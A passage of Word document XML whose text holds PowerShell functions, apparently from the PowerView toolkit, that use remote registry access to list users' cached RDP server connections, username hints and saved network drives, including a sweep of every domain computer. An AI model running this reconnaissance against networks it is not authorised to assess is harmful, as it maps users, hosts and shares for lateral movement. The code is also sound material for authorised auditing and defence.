        <w:t xml:space="preserve">                        $FoundConnection | Add-Member Noteproperty 'ComputerName' $Computer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BC3BAA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $FoundConnection | Add-Member Noteproperty 'UserName' $UserName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D49DCE6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $FoundConnection | Add-Member Noteproperty 'UserSID' $UserSID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AC2BDC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $FoundConnection | Add-Member Noteproperty 'TargetServer' $TargetServer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491B7BA0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $FoundConnection | Add-Member Noteproperty 'UsernameHint' $Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6287C3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $FoundConnection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FF0720" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C134D0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D13CF66" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5C0872F7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # pull out all the cached server info with username hints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2F51AF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $ServerKeys = $Reg.EnumKey($HKU,"$UserSID\Software\Microsoft\Terminal Server Client\Servers").sNames</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715D8C40" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2CDA5FBF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                foreach ($Server in $ServerKeys) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5097FCD3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="71CB0DB4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $UsernameHint = $Reg.GetStringValue($HKU, "$UserSID\Software\Microsoft\Terminal Server Client\Servers\$Server", 'UsernameHint').sValue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D9B78B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C62FA6E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $FoundConnection = New-Object PSObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2E2ADF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $FoundConnection | Add-Member Noteproperty 'ComputerName' $Computer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722F8FD7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $FoundConnection | Add-Member Noteproperty 'UserName' $UserName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AE1B5A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $FoundConnection | Add-Member Noteproperty 'UserSID' $UserSID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235C0312" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $FoundConnection | Add-Member Noteproperty 'TargetServer' $Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEE85EF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $FoundConnection | Add-Member Noteproperty 'UsernameHint' $UsernameHint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2894E4BD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $FoundConnection   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7317E200" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764614CE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="799917F2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01389B86" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B319DA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Write-Verbose "Error: $_"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F3A68D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764932E1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7131E2C3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="21D54AF4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA92CB7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B251331" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        Write-Warning "Error accessing $Computer, likely insufficient permissions or firewall rules on host: $_"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285E06CF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A37FC08" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CC87AA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="117D468C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0E082EC5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>filter Get-RegistryMountedDrive {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF70119" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F20B81" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B00B3D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7CABDF8D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Uses remote registry functionality to query all entries for the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AC0D7F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        the saved network mounted drive on a machine, separated by</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8EAE75" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        user and target server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC798DF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="534058BC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Note: This function requires administrative rights on the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66990733" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        machine you're enumerating.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B626BE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="41F8FA20" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A072D2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3161A9EC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The hostname to query for RDP client information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC08F17" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Defaults to localhost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183E1C5B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="21D28EF9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C3BDFA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="615BD94A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        A [Management.Automation.PSCredential] object for the remote connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BABD1F0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="29A1A6CD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3988CC4E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5012B144" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-RegistryMountedDrive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78274AE0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="16707707" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns the saved network mounted drives for the local machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73930090" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="698976EA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A3F0B5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="015639B5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-RegistryMountedDrive -ComputerName WINDOWS2.testlab.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F08215" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1CBB5BB7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns the saved network mounted drives for the WINDOWS2.testlab.local machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABA32A0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="34351857" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F390E0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6209E852" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-RegistryMountedDrive -ComputerName WINDOWS2.testlab.local -Credential $Cred</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312270E0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1151081C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns the saved network mounted drives for the WINDOWS2.testlab.local machine using alternate credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB0DFA1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="58800BF0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4356D81E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="75ADE03F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetComputer | Get-RegistryMountedDrive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A80B990" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="275B99B6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Get the saved network mounted drives for all machines in the domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0024B124" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAC5346" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="600369D0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFF4069" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4456E51E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A09C2B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Alias('HostName')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30940985" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Object[]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3DFC5F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateNotNullOrEmpty()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7707A62B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        $ComputerName = 'localhost',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7EC1C5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="48DC9009" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Management.Automation.PSCredential]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508E91A5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087641C2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC568A6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1F4C727C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # extract the computer name from whatever object was passed on the pipeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D0D224" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Computer = $ComputerName | Get-NameField</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301A99C7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="078A33F3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # HKEY_USERS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF79DC9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $HKU = 2147483651</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456CFDD0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0151ED95" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F141883" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($Credential) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FD39F4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Reg = Get-WmiObject -List 'StdRegProv' -Namespace root\default -Computername $Computer -Credential $Credential -ErrorAction SilentlyContinue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA4F4D9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C51ECF2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFBC32A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Reg = Get-WmiObject -List 'StdRegProv' -Namespace root\default -Computername $Computer -ErrorAction SilentlyContinue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7AE9C6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C674C69" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="31EB3F2C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # extract out the SIDs of domain users in this hive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E34B76" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UserSIDs = ($Reg.EnumKey($HKU, "")).sNames | ? { $_ -match 'S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+$' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D2A47E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="55FD3935" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        foreach ($UserSID in $UserSIDs) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E88925F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="08644AD7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A97C531" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $UserName = Convert-SidToName $UserSID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B74AD48" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4628A41C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $DriveLetters = ($Reg.EnumKey($HKU, "$UserSID\Network")).sNames</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202C90E1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="68BEBEE2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                ForEach($DriveLetter in $DriveLetters) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78ADD850" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $ProviderName = $Reg.GetStringValue($HKU, "$UserSID\Network\$DriveLetter", 'ProviderName').sValue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40506AB3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $RemotePath = $Reg.GetStringValue($HKU, "$UserSID\Network\$DriveLetter", 'RemotePath').sValue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681A35C2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $DriveUserName = $Reg.GetStringValue($HKU, "$UserSID\Network\$DriveLetter", 'UserName').sValue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508D406C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    if(-not $UserName) { $UserName = '' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55ED4D1E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0BB46898" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    if($RemotePath -and ($RemotePath -ne '')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231D49E4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $MountedDrive = New-Object PSObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A86BEC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $MountedDrive | Add-Member Noteproperty 'ComputerName' $Computer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19410A23" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $MountedDrive | Add-Member Noteproperty 'UserName' $UserName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2EAC8A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $MountedDrive | Add-Member Noteproperty 'UserSID' $UserSID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9E2370" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $MountedDrive | Add-Member Noteproperty 'DriveLetter' $DriveLetter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C282E4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $MountedDrive | Add-Member Noteproperty 'ProviderName' $ProviderName</w:t>
      </w:r>
    </w:p>
